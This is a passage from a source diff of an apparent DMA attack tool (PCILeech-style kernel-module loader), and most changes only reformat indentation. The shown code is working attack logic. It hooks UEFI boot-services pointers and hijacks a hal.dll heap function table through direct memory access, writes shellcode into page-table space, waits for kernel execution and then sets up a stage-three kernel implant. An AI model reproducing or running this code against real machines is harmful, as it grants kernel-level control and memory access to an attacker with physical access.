+                if(!(qwAddr_BOOTSERV & 0xfffffff8) || !(qwAddr_RUNTSERV & 0xfffffff8)) { continue; }
+                ctx->cfg->qwEFI_IBI_SYST = dwAddrCurrent + o;
+                ps.szAction = "Waiting for KMD to activate";
+                PageStatClose(&ps);
+                LocalFree(pb);
+                return TRUE;
+            }
+        } else {
+            PageStatUpdate(&ps, dwAddrCurrent + 0x100000, 0, 0x100);
+        }
+        dwAddrCurrent += 0x100000;
+    }
+    LocalFree(pb);
+    PageStatClose(&ps);
+    return FALSE;
 }
 
 BOOL KMDOpen_UEFI(_Inout_ PPCILEECH_CONTEXT ctx, _In_ BYTE bOffsetHookBootServices)
 {
-	BOOL result;
-	BYTE pb[0x2000];
-	QWORD qwAddrEFI_BOOTSERV, qwAddrEFI_RUNTSERV, qwAddrHookedFunction;
-	QWORD qwAddrKMDDATA, qwAddrKMD;
-	DWORD cb;
-	qwAddrKMDDATA = 0x38000000;	// Place KMD at a "random" address- Hopefully this works w/o having it overwritten.
-	//------------------------------------------------
-	// 1: Fetch IBI_SYST and BOOTSERV tables
-	//------------------------------------------------
-	if(!ctx->cfg->qwEFI_IBI_SYST) {
-		result = KMDOpen_UEFI_FindEfiBase(ctx);
-		if(!result) {
-			printf("KMD: Failed. EFI system table not found.\n");
-			return FALSE;
-		}
-	}
-	result = DeviceReadDMA(ctx, ctx->cfg->qwEFI_IBI_SYST & ~0xfff, pb, 0x2000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	result = result && (0x5453595320494249 == *(PQWORD)(pb + (ctx->cfg->qwEFI_IBI_SYST & 0xfff)));
-	qwAddrEFI_BOOTSERV = *(PQWORD)(pb + (ctx->cfg->qwEFI_IBI_SYST & 0xfff) + 0x60);
-	qwAddrEFI_RUNTSERV = *(PQWORD)(pb + (ctx->cfg->qwEFI_IBI_SYST & 0xfff) + 0x58);
-	result = result && qwAddrEFI_RUNTSERV && (0 == (qwAddrEFI_RUNTSERV & 0xffffffff00000007));
-	result = result && qwAddrEFI_BOOTSERV && (0 == (qwAddrEFI_BOOTSERV & 0xffffffff00000007));
-	if(!result) {
-		printf("KMD: Failed. Error reading or interpreting memory #1 at: 0x%llx\n", ctx->cfg->qwEFI_IBI_SYST);
-		return FALSE;
-	}
-	result = DeviceReadDMA(ctx, qwAddrEFI_BOOTSERV & ~0xfff, pb, 0x2000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	result = result && (0x56524553544f4f42 == *(PQWORD)(pb + (qwAddrEFI_BOOTSERV & 0xfff)));
-	qwAddrHookedFunction = *(PQWORD)(pb + (qwAddrEFI_BOOTSERV & 0xfff) + bOffsetHookBootServices);
-	result = result && qwAddrHookedFunction && (0 == (qwAddrHookedFunction & 0xffffffff00000000));
-	if(!result) {
-		printf("KMD: Failed. Error reading or interpreting memory #2 at: 0x%llx :: 0x%llx\n", ctx->cfg->qwEFI_IBI_SYST, qwAddrEFI_BOOTSERV);
-		return FALSE;
-	}
-	//------------------------------------------------
-	// 2: Prepare Patch
-	//------------------------------------------------
-	memset(pb, 0, 0x2000);
-	Util_ParseHexFileBuiltin("DEFAULT_UEFI_X64", pb + 0x1000, 0x1000, &cb);
-	*(PDWORD)(pb + 0x1004) = (DWORD)ctx->cfg->qwEFI_IBI_SYST;
-	*(PDWORD)(pb + 0x1008) = (DWORD)(qwAddrEFI_BOOTSERV + bOffsetHookBootServices);
-	*(PDWORD)(pb + 0x100C) = (DWORD)qwAddrHookedFunction;
-	//------------------------------------------------
-	// 3: Patch
-	//------------------------------------------------
-	if(ctx->cfg->fVerbose) {
-		printf("INFO: IBI SYST:   0x%08x\n", (DWORD)ctx->cfg->qwEFI_IBI_SYST);
-		printf("INFO: BOOTSERV:   0x%08x\n", (DWORD)qwAddrEFI_BOOTSERV);
-	}
-	result = DeviceWriteDMA(ctx, qwAddrKMDDATA, pb, 0x2000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	if(!result) {
-		printf("KMD: Failed. Failed writing to memory #1.\n");
-		return FALSE;
-	}
-	qwAddrKMD = qwAddrKMDDATA + 0x1000;
-	result = DeviceWriteDMA(ctx, qwAddrEFI_BOOTSERV + bOffsetHookBootServices, (PBYTE)&qwAddrKMD, 8, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	if(!result) {
-		printf("KMD: Failed. Failed writing to memory #2.\n");
-		return FALSE;
-	}
-	//------------------------------------------------
-	// 4: Wait for execution
-	//------------------------------------------------
-	printf("KMD: Waiting to receive execution.\n");
-	do {
-		Sleep(100);
-		if(!DeviceReadDMA(ctx, qwAddrKMDDATA, pb, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-			printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
-			return FALSE;
-		}
-	} while(KMDDATA_MAGIC != *(PQWORD)pb);
-	//------------------------------------------------
-	// 5: Retrieve Memory Map
-	// (ugly to issue a 2nd unnecessary DMA write, but works to reuse code) 
-	//------------------------------------------------
-	return KMD_SetupStage3(ctx, (DWORD)qwAddrKMDDATA, pb + 0x1000, 0x1000);
+    BOOL result;
+    BYTE pb[0x2000];
+    QWORD qwAddrEFI_BOOTSERV, qwAddrEFI_RUNTSERV, qwAddrHookedFunction;
+    QWORD qwAddrKMDDATA, qwAddrKMD;
+    DWORD cb;
+    qwAddrKMDDATA = 0x38000000; // Place KMD at a "random" address- Hopefully this works w/o having it overwritten.
+    //------------------------------------------------
+    // 1: Fetch IBI_SYST and BOOTSERV tables
+    //------------------------------------------------
+    if(!ctx->cfg->qwEFI_IBI_SYST) {
+        result = KMDOpen_UEFI_FindEfiBase(ctx);
+        if(!result) {
+            printf("KMD: Failed. EFI system table not found.\n");
+            return FALSE;
+        }
+    }
+    result = DeviceReadDMA(ctx, ctx->cfg->qwEFI_IBI_SYST & ~0xfff, pb, 0x2000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    result = result && (0x5453595320494249 == *(PQWORD)(pb + (ctx->cfg->qwEFI_IBI_SYST & 0xfff)));
+    qwAddrEFI_BOOTSERV = *(PQWORD)(pb + (ctx->cfg->qwEFI_IBI_SYST & 0xfff) + 0x60);
+    qwAddrEFI_RUNTSERV = *(PQWORD)(pb + (ctx->cfg->qwEFI_IBI_SYST & 0xfff) + 0x58);
+    result = result && qwAddrEFI_RUNTSERV && (0 == (qwAddrEFI_RUNTSERV & 0xffffffff00000007));
+    result = result && qwAddrEFI_BOOTSERV && (0 == (qwAddrEFI_BOOTSERV & 0xffffffff00000007));
+    if(!result) {
+        printf("KMD: Failed. Error reading or interpreting memory #1 at: 0x%llx\n", ctx->cfg->qwEFI_IBI_SYST);
+        return FALSE;
+    }
+    result = DeviceReadDMA(ctx, qwAddrEFI_BOOTSERV & ~0xfff, pb, 0x2000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    result = result && (0x56524553544f4f42 == *(PQWORD)(pb + (qwAddrEFI_BOOTSERV & 0xfff)));
+    qwAddrHookedFunction = *(PQWORD)(pb + (qwAddrEFI_BOOTSERV & 0xfff) + bOffsetHookBootServices);
+    result = result && qwAddrHookedFunction && (0 == (qwAddrHookedFunction & 0xffffffff00000000));
+    if(!result) {
+        printf("KMD: Failed. Error reading or interpreting memory #2 at: 0x%llx :: 0x%llx\n", ctx->cfg->qwEFI_IBI_SYST, qwAddrEFI_BOOTSERV);
+        return FALSE;
+    }
+    //------------------------------------------------
+    // 2: Prepare Patch
+    //------------------------------------------------
+    memset(pb, 0, 0x2000);
+    Util_ParseHexFileBuiltin("DEFAULT_UEFI_X64", pb + 0x1000, 0x1000, &cb);
+    *(PDWORD)(pb + 0x1004) = (DWORD)ctx->cfg->qwEFI_IBI_SYST;
+    *(PDWORD)(pb + 0x1008) = (DWORD)(qwAddrEFI_BOOTSERV + bOffsetHookBootServices);
+    *(PDWORD)(pb + 0x100C) = (DWORD)qwAddrHookedFunction;
+    //------------------------------------------------
+    // 3: Patch
+    //------------------------------------------------
+    if(ctx->cfg->fVerbose) {
+        printf("INFO: IBI SYST:   0x%08x\n", (DWORD)ctx->cfg->qwEFI_IBI_SYST);
+        printf("INFO: BOOTSERV:   0x%08x\n", (DWORD)qwAddrEFI_BOOTSERV);
+    }
+    result = DeviceWriteDMA(ctx, qwAddrKMDDATA, pb, 0x2000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    if(!result) {
+        printf("KMD: Failed. Failed writing to memory #1.\n");
+        return FALSE;
+    }
+    qwAddrKMD = qwAddrKMDDATA + 0x1000;
+    result = DeviceWriteDMA(ctx, qwAddrEFI_BOOTSERV + bOffsetHookBootServices, (PBYTE)&qwAddrKMD, 8, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    if(!result) {
+        printf("KMD: Failed. Failed writing to memory #2.\n");
+        return FALSE;
+    }
+    //------------------------------------------------
+    // 4: Wait for execution
+    //------------------------------------------------
+    printf("KMD: Waiting to receive execution.\n");
+    do {
+        Sleep(100);
+        if(!DeviceReadDMA(ctx, qwAddrKMDDATA, pb, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+            printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
+            return FALSE;
+        }
+    } while(KMDDATA_MAGIC != *(PQWORD)pb);
+    //------------------------------------------------
+    // 5: Retrieve Memory Map
+    // (ugly to issue a 2nd unnecessary DMA write, but works to reuse code)
+    //------------------------------------------------
+    return KMD_SetupStage3(ctx, (DWORD)qwAddrKMDDATA, pb + 0x1000, 0x1000);
 }
 
 // https://blog.coresecurity.com/2016/08/25/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-3-windows-hals-heap/
@@ -679,100 +683,100 @@ BOOL KMDOpen_UEFI(_Inout_ PPCILEECH_CONTEXT ctx, _In_ BYTE bOffsetHookBootServic
 // HAL is randomized between: fffff78000000000:fffff7ffc0000000 (win10 1703) [512 possible positions in PDPT]
 BOOL KMDOpen_HalHijack(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	DWORD ADDR_HAL_HEAP_PA = 0x00001000;
-	//QWORD ADDR_SHELLCODE_VA = 0xffffffffffc00100;
-	BOOL result;
-	SIGNATURE oSignature;
-	PDWORD pdwPhysicalAddress;
-	BYTE pbHal[0x1000] = { 0 }, pbPT[0x1000] = { 0 }, pbNULL[0x300] = { 0 };
-	DWORD dwHookFnPgOffset;
-	QWORD qwPML4, qwHalVA, qwAddrHalHeapVA, qwPTEOrig, qwPTEPA, qwPTPA, qwShellcodeVA;
-	//------------------------------------------------
-	// 1: Fetch hal.dll heap and perform sanity checks.
-	//------------------------------------------------
-	Util_CreateSignatureWindowsHalGeneric(&oSignature);
-	result = DeviceReadDMA(ctx, ADDR_HAL_HEAP_PA, pbHal, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	qwPML4 = *(PQWORD)(pbHal + 0xa0);
-	qwHalVA = *(PQWORD)(pbHal + 0x78);
-	if(!result || (qwPML4 & 0xffffffff00000fff)) {
-		printf("KMD: Failed. Error reading or interpreting memory #1.\n");
-		return FALSE;
-	}
-	if(((qwHalVA & 0xfffffffffff00fff) != 0xffffffffffd00000) && ((qwHalVA & 0xffffff803fe00fff) != 0xfffff78000000000)) {
-		printf("KMD: Failed. Error reading or interpreting memory #2.\n");
-		return FALSE;
-	}
-	result = Util_PageTable_ReadPTE(ctx, qwPML4, qwHalVA, &qwPTEOrig, &qwPTEPA);
-	if(!result || ((qwPTEOrig & 0x00007ffffffff003) != 0x1003)) {
-		printf("KMD: Failed. Error reading or interpreting PTEs.\n");
-		return FALSE;
-	}
-	//------------------------------------------------
-	// 2: Search for function table in hal.dll heap.
-	//------------------------------------------------
-	for(qwAddrHalHeapVA = (qwHalVA & 0xffffffffffd00000); qwAddrHalHeapVA < (qwHalVA & 0xffffffffffd00000) + 0x100000; qwAddrHalHeapVA += 0x1000) {
-		result =
-			Util_PageTable_ReadPTE(ctx, qwPML4, qwAddrHalHeapVA, &qwPTEOrig, &qwPTEPA) &&
-			((qwPTEOrig & 0x00007fff00000003) == 0x00000003) &&
-			DeviceReadDMA(ctx, (qwPTEOrig & 0xfffff000), pbHal, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL) &&
-			KMD_Win_SearchTableHalpInterruptController(pbHal, qwAddrHalHeapVA, &dwHookFnPgOffset);
-		if(result) {
-			break;
-		}
-	}
-	if(!result) {
-		printf("KMD: Failed. Failed finding entry point.\n");
-		return FALSE;
-	}
-	qwPTPA = qwPTEPA & ~0xfff;
-	result = DeviceReadDMA(ctx, (DWORD)qwPTPA, pbPT, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	if(!result || memcmp(pbPT + 0x200, pbNULL, 0x300)) { // 0x300 bytes between 0x200:0x500 in Hal PT must be zero
-		printf("KMD: Failed. Error reading or interpreting PT.\n");
-		return FALSE;
-	}
-	qwShellcodeVA = (qwAddrHalHeapVA & 0xffffffffffe00000) + 0x40000 + 0x210;
-	//------------------------------------------------
-	// 3: Write shellcode into page table empty space.
-	//------------------------------------------------
-	*(PQWORD)(pbPT + 0x200) = qwPTPA | 0x63; // PTE for addr
-	memcpy(pbPT + 0x210, oSignature.chunk[3].pb, oSignature.chunk[3].cb);
-	*(PQWORD)(pbPT + 0x210 + STAGE2_OFFSET_FN_STAGE1_ORIG) = *(PQWORD)(pbHal + dwHookFnPgOffset);
-	*(PQWORD)(pbPT + 0x210 + STAGE2_OFFSET_EXTRADATA1) = qwAddrHalHeapVA + dwHookFnPgOffset;
-	DeviceWriteDMA(ctx, qwPTPA + 0x200, pbPT + 0x200, 0x300, PCILEECH_MEM_FLAG_RETRYONFAIL);
-	Util_PageTable_SetMode(ctx, qwPML4, qwShellcodeVA, TRUE);
-	//------------------------------------------------
-	// 4: Place hook by overwriting function addr in hal.dll heap.
-	//------------------------------------------------
-	Sleep(250);
-	DeviceWriteDMA(ctx, (qwPTEOrig & 0xfffff000) + dwHookFnPgOffset, (PBYTE)&qwShellcodeVA, sizeof(QWORD), PCILEECH_MEM_FLAG_RETRYONFAIL);
-	if(ctx->cfg->fVerbose) {
-		printf("INFO: PA PT BASE:   0x%016llx\n", qwPML4);
-		printf("INFO: PA PT:        0x%016llx\n", qwPTPA);
-		printf("INFO: PA HAL HEAP:  0x%016llx\n", (qwPTEOrig & 0xfffff000) + dwHookFnPgOffset);
-		printf("INFO: VA SHELLCODE: 0x%016llx\n", qwShellcodeVA);
-	}
-	printf("KMD: Code inserted into the kernel - Waiting to receive execution.\n");
-	//------------------------------------------------
-	// 5: wait for patch to reveive execution.
-	//------------------------------------------------
-	pdwPhysicalAddress = (PDWORD)(pbPT + 0x210 + STAGE2_OFFSET_STAGE3_PHYSADDR);
-	do {
-		Sleep(100);
-		if(!DeviceReadDMA(ctx, (DWORD)qwPTPA, pbPT, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-			printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
-			return FALSE;
-		}
-	} while(!*pdwPhysicalAddress);
-	printf("KMD: Execution received - continuing ...\n");
-	//------------------------------------------------
-	// 6: Restore hooks to original.
-	//------------------------------------------------
-	Sleep(250);
-	DeviceWriteDMA(ctx, qwPTPA + 0x200, pbNULL, 0x300, 0);
-	//------------------------------------------------
-	// 7: Set up kernel module shellcode (stage3) and finish.
-	//------------------------------------------------
-	return KMD_SetupStage3(ctx, *pdwPhysicalAddress, oSignature.chunk[4].pb, 4096);
+    DWORD ADDR_HAL_HEAP_PA = 0x00001000;
+    //QWORD ADDR_SHELLCODE_VA = 0xffffffffffc00100;
+    BOOL result;
+    SIGNATURE oSignature;
+    PDWORD pdwPhysicalAddress;
+    BYTE pbHal[0x1000] = { 0 }, pbPT[0x1000] = { 0 }, pbNULL[0x300] = { 0 };
+    DWORD dwHookFnPgOffset;
+    QWORD qwPML4, qwHalVA, qwAddrHalHeapVA, qwPTEOrig, qwPTEPA, qwPTPA, qwShellcodeVA;
+    //------------------------------------------------
+    // 1: Fetch hal.dll heap and perform sanity checks.
+    //------------------------------------------------
+    Util_CreateSignatureWindowsHalGeneric(&oSignature);
+    result = DeviceReadDMA(ctx, ADDR_HAL_HEAP_PA, pbHal, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    qwPML4 = *(PQWORD)(pbHal + 0xa0);
+    qwHalVA = *(PQWORD)(pbHal + 0x78);
+    if(!result || (qwPML4 & 0xffffffff00000fff)) {
+        printf("KMD: Failed. Error reading or interpreting memory #1.\n");
+        return FALSE;
+    }
+    if(((qwHalVA & 0xfffffffffff00fff) != 0xffffffffffd00000) && ((qwHalVA & 0xffffff803fe00fff) != 0xfffff78000000000)) {
+        printf("KMD: Failed. Error reading or interpreting memory #2.\n");
+        return FALSE;
+    }
+    result = Util_PageTable_ReadPTE(ctx, qwPML4, qwHalVA, &qwPTEOrig, &qwPTEPA);
+    if(!result || ((qwPTEOrig & 0x00007ffffffff003) != 0x1003)) {
+        printf("KMD: Failed. Error reading or interpreting PTEs.\n");
+        return FALSE;
+    }
+    //------------------------------------------------
+    // 2: Search for function table in hal.dll heap.
+    //------------------------------------------------
+    for(qwAddrHalHeapVA = (qwHalVA & 0xffffffffffd00000); qwAddrHalHeapVA < (qwHalVA & 0xffffffffffd00000) + 0x100000; qwAddrHalHeapVA += 0x1000) {
+        result =
+            Util_PageTable_ReadPTE(ctx, qwPML4, qwAddrHalHeapVA, &qwPTEOrig, &qwPTEPA) &&
+            ((qwPTEOrig & 0x00007fff00000003) == 0x00000003) &&
+            DeviceReadDMA(ctx, (qwPTEOrig & 0xfffff000), pbHal, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL) &&
+            KMD_Win_SearchTableHalpInterruptController(pbHal, qwAddrHalHeapVA, &dwHookFnPgOffset);
+        if(result) {
+            break;
+        }
+    }
+    if(!result) {
+        printf("KMD: Failed. Failed finding entry point.\n");
+        return FALSE;
+    }
+    qwPTPA = qwPTEPA & ~0xfff;
+    result = DeviceReadDMA(ctx, (DWORD)qwPTPA, pbPT, 0x1000, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    if(!result || memcmp(pbPT + 0x200, pbNULL, 0x300)) { // 0x300 bytes between 0x200:0x500 in Hal PT must be zero
+        printf("KMD: Failed. Error reading or interpreting PT.\n");
+        return FALSE;
+    }
+    qwShellcodeVA = (qwAddrHalHeapVA & 0xffffffffffe00000) + 0x40000 + 0x210;
+    //------------------------------------------------
+    // 3: Write shellcode into page table empty space.
+    //------------------------------------------------
+    *(PQWORD)(pbPT + 0x200) = qwPTPA | 0x63; // PTE for addr
+    memcpy(pbPT + 0x210, oSignature.chunk[3].pb, oSignature.chunk[3].cb);
+    *(PQWORD)(pbPT + 0x210 + STAGE2_OFFSET_FN_STAGE1_ORIG) = *(PQWORD)(pbHal + dwHookFnPgOffset);
+    *(PQWORD)(pbPT + 0x210 + STAGE2_OFFSET_EXTRADATA1) = qwAddrHalHeapVA + dwHookFnPgOffset;
+    DeviceWriteDMA(ctx, qwPTPA + 0x200, pbPT + 0x200, 0x300, PCILEECH_MEM_FLAG_RETRYONFAIL);
+    Util_PageTable_SetMode(ctx, qwPML4, qwShellcodeVA, TRUE);
+    //------------------------------------------------
+    // 4: Place hook by overwriting function addr in hal.dll heap.
+    //------------------------------------------------
+    Sleep(250);
+    DeviceWriteDMA(ctx, (qwPTEOrig & 0xfffff000) + dwHookFnPgOffset, (PBYTE)&qwShellcodeVA, sizeof(QWORD), PCILEECH_MEM_FLAG_RETRYONFAIL);
+    if(ctx->cfg->fVerbose) {
+        printf("INFO: PA PT BASE:   0x%016llx\n", qwPML4);
+        printf("INFO: PA PT:        0x%016llx\n", qwPTPA);
+        printf("INFO: PA HAL HEAP:  0x%016llx\n", (qwPTEOrig & 0xfffff000) + dwHookFnPgOffset);
+        printf("INFO: VA SHELLCODE: 0x%016llx\n", qwShellcodeVA);
+    }
+    printf("KMD: Code inserted into the kernel - Waiting to receive execution.\n");
+    //------------------------------------------------
+    // 5: wait for patch to reveive execution.
+    //------------------------------------------------
+    pdwPhysicalAddress = (PDWORD)(pbPT + 0x210 + STAGE2_OFFSET_STAGE3_PHYSADDR);
+    do {
+        Sleep(100);
+        if(!DeviceReadDMA(ctx, (DWORD)qwPTPA, pbPT, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+            printf("KMD: Failed. DMA Read failed while waiting to receive physical address.\n");
+            return FALSE;
+        }
+    } while(!*pdwPhysicalAddress);
+    printf("KMD: Execution received - continuing ...\n");
+    //------------------------------------------------
+    // 6: Restore hooks to original.
+    //------------------------------------------------
+    Sleep(250);
+    DeviceWriteDMA(ctx, qwPTPA + 0x200, pbNULL, 0x300, 0);
+    //------------------------------------------------
+    // 7: Set up kernel module shellcode (stage3) and finish.
+    //------------------------------------------------
+    return KMD_SetupStage3(ctx, *pdwPhysicalAddress, oSignature.chunk[4].pb, 4096);
 }
 
 //-------------------------------------------------------------------------------
@@ -781,471 +785,471 @@ BOOL KMDOpen_HalHijack(_Inout_ PPCILEECH_CONTEXT ctx)
 
 BOOL KMD_IsRangeInPhysicalMap(_In_ PKMDHANDLE phKMD, _In_ QWORD qwBaseAddress, _In_ QWORD qwNumberOfBytes)
 {
-	QWORD i;
-	PHYSICAL_MEMORY_RANGE pmr;
-	for(i = 0; i < phKMD->cPhysicalMap; i++) {
-		pmr = phKMD->pPhysicalMap[i];
-		if(((pmr.BaseAddress <= qwBaseAddress) && (pmr.BaseAddress + pmr.NumberOfBytes >= qwBaseAddress + qwNumberOfBytes))) {
-			return TRUE;
-		}
-	}
-	return FALSE;
+    QWORD i;
+    PHYSICAL_MEMORY_RANGE pmr;
+    for(i = 0; i < phKMD->cPhysicalMap; i++) {
+        pmr = phKMD->pPhysicalMap[i];
+        if(((pmr.BaseAddress <= qwBaseAddress) && (pmr.BaseAddress + pmr.NumberOfBytes >= qwBaseAddress + qwNumberOfBytes))) {
+            return TRUE;
+        }
+    }
+    return FALSE;
 }
 
 BOOL KMD_SubmitCommand(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD op)
 {
-	HANDLE hCallback = NULL;
-	ctx->pk->_op = op;
-	if(!DeviceWriteDMA(ctx, ctx->phKMD->dwPageAddr32, ctx->phKMD->pbPageData, 4096, 0)) {
-		return FALSE;
-	}
-	do {
-		if(!DeviceReadDMA(ctx, ctx->phKMD->dwPageAddr32, ctx->phKMD->pbPageData, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-			Exec_CallbackClose(hCallback);
-			return FALSE;
-		}
-		if((op != KMD_CMD_TERMINATE) && (op != KMD_CMD_MEM_INFO) && (ctx->pk->MAGIC != KMDDATA_MAGIC) && (ctx->pk->MAGIC != KMDDATA_MAGIC_PARTIAL)) {
-			printf("PCILEECH: FAIL: KMDDATA corruption! - bit errors? Address: 0x%08x. Terminating.\n", ctx->phKMD->dwPageAddr32);
-			DeviceClose(ctx);
-			ExitProcess(0);
-		}
-		if(ctx->pk->_op == KMD_CMD_EXEC_EXTENDED) {
-			Exec_Callback(ctx, &hCallback);
-		}
-	} while(((ctx->pk->_op != KMD_CMD_COMPLETED) || (ctx->pk->_status != 1)) && ctx->pk->_status < 0x0fffffff);
-	if(hCallback) { Exec_CallbackClose(hCallback); }
-	return TRUE;
+    HANDLE hCallback = NULL;
+    ctx->pk->_op = op;
+    if(!DeviceWriteDMA(ctx, ctx->phKMD->dwPageAddr32, ctx->phKMD->pbPageData, 4096, 0)) {
+        return FALSE;
+    }
+    do {
+        if(!DeviceReadDMA(ctx, ctx->phKMD->dwPageAddr32, ctx->phKMD->pbPageData, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+            Exec_CallbackClose(hCallback);
+            return FALSE;
+        }
+        if((op != KMD_CMD_TERMINATE) && (op != KMD_CMD_MEM_INFO) && (ctx->pk->MAGIC != KMDDATA_MAGIC) && (ctx->pk->MAGIC != KMDDATA_MAGIC_PARTIAL)) {
+            printf("PCILEECH: FAIL: KMDDATA corruption! - bit errors? Address: 0x%08x. Terminating.\n", ctx->phKMD->dwPageAddr32);
+            DeviceClose(ctx);
+            ExitProcess(0);
+        }
+        if(ctx->pk->_op == KMD_CMD_EXEC_EXTENDED) {
+            Exec_Callback(ctx, &hCallback);
+        }
+    } while(((ctx->pk->_op != KMD_CMD_COMPLETED) || (ctx->pk->_status != 1)) && ctx->pk->_status < 0x0fffffff);
+    if(hCallback) { Exec_CallbackClose(hCallback); }
+    return TRUE;
 }
 
 VOID KMD_PhysicalMemoryMapDisplay(_In_ PKMDHANDLE phKMD)
 {
-	QWORD i;
-	PHYSICAL_MEMORY_RANGE pmr;
-	printf("Kernel reported memory map below:\n START              END               #PAGES\n");
-	for(i = 0; i < phKMD->cPhysicalMap; i++) {
-		pmr = phKMD->pPhysicalMap[i];
-		printf(
-			" %016llx - %016llx  %08llx\n",
-			pmr.BaseAddress,
-			pmr.BaseAddress + pmr.NumberOfBytes - 1,
-			pmr.NumberOfBytes / 0x1000);
-	}
-	printf("----------------------------------------------\n");
+    QWORD i;
+    PHYSICAL_MEMORY_RANGE pmr;
+    printf("Kernel reported memory map below:\n START              END               #PAGES\n");
+    for(i = 0; i < phKMD->cPhysicalMap; i++) {
+        pmr = phKMD->pPhysicalMap[i];
+        printf(
+            " %016llx - %016llx  %08llx\n",
+            pmr.BaseAddress,
+            pmr.BaseAddress + pmr.NumberOfBytes - 1,
+            pmr.NumberOfBytes / 0x1000);
+    }
+    printf("----------------------------------------------\n");
 }
 
 BOOL KMD_GetPhysicalMemoryMap(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	QWORD qwMaxMemoryAddress;
-	KMD_SubmitCommand(ctx, KMD_CMD_MEM_INFO);
-	if(!ctx->pk->_result || !ctx->pk->_size)	{
-		return FALSE;
-	}
-	ctx->phKMD->pPhysicalMap = LocalAlloc(LMEM_ZEROINIT, (ctx->pk->_size + 0x1000) & 0xfffff000);
-	if(!ctx->phKMD->pPhysicalMap) { return FALSE; }
-	DeviceReadDMAEx(ctx, ctx->pk->DMAAddrPhysical, (PBYTE)ctx->phKMD->pPhysicalMap, (DWORD)((ctx->pk->_size + 0x1000) & 0xfffff000), NULL, 0);
-	ctx->phKMD->cPhysicalMap = ctx->pk->_size / sizeof(PHYSICAL_MEMORY_RANGE);
-	if(ctx->phKMD->cPhysicalMap > 0x2000) { return FALSE; }
-	// adjust max memory according to physical memory
-	qwMaxMemoryAddress = ctx->phKMD->pPhysicalMap[ctx->phKMD->cPhysicalMap - 1].BaseAddress;
-	qwMaxMemoryAddress += ctx->phKMD->pPhysicalMap[ctx->phKMD->cPhysicalMap - 1].NumberOfBytes;
-	if(ctx->cfg->qwAddrMax > qwMaxMemoryAddress) {
-		ctx->cfg->qwAddrMax = qwMaxMemoryAddress - 1;
-	}
-	if(ctx->cfg->fVerbose) {
-		KMD_PhysicalMemoryMapDisplay(ctx->phKMD);
-	}
-	return TRUE;
+    QWORD qwMaxMemoryAddress;
+    KMD_SubmitCommand(ctx, KMD_CMD_MEM_INFO);
+    if(!ctx->pk->_result || !ctx->pk->_size) {
+        return FALSE;
+    }
+    ctx->phKMD->pPhysicalMap = LocalAlloc(LMEM_ZEROINIT, (ctx->pk->_size + 0x1000) & 0xfffff000);
+    if(!ctx->phKMD->pPhysicalMap) { return FALSE; }
+    DeviceReadDMAEx(ctx, ctx->pk->DMAAddrPhysical, (PBYTE)ctx->phKMD->pPhysicalMap, (DWORD)((ctx->pk->_size + 0x1000) & 0xfffff000), NULL, 0);
+    ctx->phKMD->cPhysicalMap = ctx->pk->_size / sizeof(PHYSICAL_MEMORY_RANGE);
+    if(ctx->phKMD->cPhysicalMap > 0x2000) { return FALSE; }
+    // adjust max memory according to physical memory
+    qwMaxMemoryAddress = ctx->phKMD->pPhysicalMap[ctx->phKMD->cPhysicalMap - 1].BaseAddress;
+    qwMaxMemoryAddress += ctx->phKMD->pPhysicalMap[ctx->phKMD->cPhysicalMap - 1].NumberOfBytes;
+    if(ctx->cfg->qwAddrMax > qwMaxMemoryAddress) {
+        ctx->cfg->qwAddrMax = qwMaxMemoryAddress - 1;
+    }
+    if(ctx->cfg->fVerbose) {
+        KMD_PhysicalMemoryMapDisplay(ctx->phKMD);
+    }
+    return TRUE;
 }
 
 BOOL KMD_SetupStage3(_Inout_ PPCILEECH_CONTEXT ctx, _In_ DWORD dwPhysicalAddress, _In_ PBYTE pbStage3, _In_ DWORD cbStage3)
 {
-	//------------------------------------------------
-	// 1: Set up kernel module shellcode (stage3)
-	//------------------------------------------------
-	if(dwPhysicalAddress == 0xffffffff) {
-		printf("KMD: Failed. Stage2 shellcode error.\n");
-		return FALSE;
-	}
-	if(ctx->cfg->fVerbose) {
-		printf("INFO: PA KMD BASE:  0x%08x\n", dwPhysicalAddress);
-	}
-	DeviceWriteDMA(ctx, dwPhysicalAddress + 0x1000, pbStage3, cbStage3, 0);
-	ctx->phKMD = (PKMDHANDLE)LocalAlloc(LMEM_ZEROINIT, sizeof(KMDHANDLE));
-	if(!ctx->phKMD) { return FALSE; }
-	ctx->phKMD->pk = (PKMDDATA)ctx->phKMD->pbPageData;
-	ctx->pk = ctx->phKMD->pk;
-	ctx->phKMD->dwPageAddr32 = dwPhysicalAddress;
-	DeviceReadDMA(ctx, ctx->phKMD->dwPageAddr32, ctx->phKMD->pbPageData, 4096, 0);
-	//------------------------------------------------
-	// 2: Retrieve physical memory range map and complete open action.
-	//------------------------------------------------
-	if(!KMD_GetPhysicalMemoryMap(ctx)) {
-		printf("KMD: Failed. Failed to retrieve physical memory map.\n");
-		KMDClose(ctx);
-		return FALSE;
-	}
-	ctx->cfg->qwKMD = ctx->phKMD->dwPageAddr32;
-	return TRUE;
+    //------------------------------------------------
